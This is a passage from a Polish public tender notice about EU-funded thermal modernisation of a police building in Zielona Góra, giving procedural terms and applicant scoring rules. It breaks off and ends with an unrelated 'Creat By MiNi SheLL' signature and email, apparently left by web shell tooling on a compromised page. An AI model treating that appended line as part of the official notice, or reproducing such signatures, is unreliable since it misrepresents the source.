<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy finansowania z udziałem środków pochodzących z UE w ramach Projektu Komendy Wojewódzkiej Policji w Gorzowie Wlkp. pn.: Termomodernizacja budynku Komendy Miejskiej Policji w Zielonej Górze złożonego w ramach Indykatywnego Planu Inwestycyjnego Lubuskiego Regionalnego Programu Operacyjnego - IPI LRPO - 2007-2013 Priorytet III Ochrona i zarządzanie zasobami środowiska przyrodniczego, Działanie 3.2 Poprawa jakości powietrza, efektywności energetycznej oraz rozwój  i wykorzystanie odnawialnych źródeł energii. Na przedmiotowe zadanie Komenda Wojewódzka Policji w Gorzowie Wlkp. uzyskała Decyzję Ministra Finansów nr 48/126/2009 o zapewnieniu finansowania realizacji przedsięwzięcia z dnia 21.05.2009r.
INFORMACJE DODATKOWE:
1. Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.) w języku polskim (art. 9 ust. 2 ustawy P.z.p.).
2.Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować w godzinach urzędowania Zamawiającego tj: od godziny 7:30 do 15:30 w dni robocze, na adres Zamawiającego - ul. Kwiatowa 10, 66-400 Gorzów Wlkp., Sekcja ds. Zamówień Publicznych
e-mail: kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub  fax 095/721 14 35. 
3.Zamawiający nie zamierza zawrzeć umowy ramowej.
4.Zamawiający żąda od wybranego Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy, najpóźniej w dniu zawarcia umowy,  w wysokości 5% ceny całkowitej podanej w ofercie, w formie dozwolonej przez ustawę P.z.p. (art. 148 ustawy P.z.p.)
5.Zamawiający nie zamierza zamieszczać Specyfikacji Istotnych Warunków Zamówienia na stronie internetowej.
6. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art.24 ust.2 pkt.2 Ustawy P.z.p. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego.
7. Ocena wniosków - oparta będzie na ocenie spełnia / nie spełnia wszystkich warunków. Jeżeli  ilość  wniosków spełniających minimalne wymagania będzie większa niż 5, Zamawiający dokona oceny złożonych wniosków wg kryterium: doświadczenie - znaczenie 100%.
Zamawiający przyzna:
1 pkt  - za wykazanie wymaganych minimum 3 robót budowlanych zrealizowanych w 100%,  w tym, min. jedna robota budowlana polegająca na wymianie instalacji C.O. na czynnym obiekcie (budynek w trakcie eksploatacji) o powierzchni ogrzewalnej min. 5.000 m2 każda wykazana robota oraz min. jedna robota polegająca na wykonaniu systemu solarnego o powierzchni absorpcji min. 80m2 każdego wykazanego systemu;

Creat By MiNi SheLL
Email: jattceo@gmail.com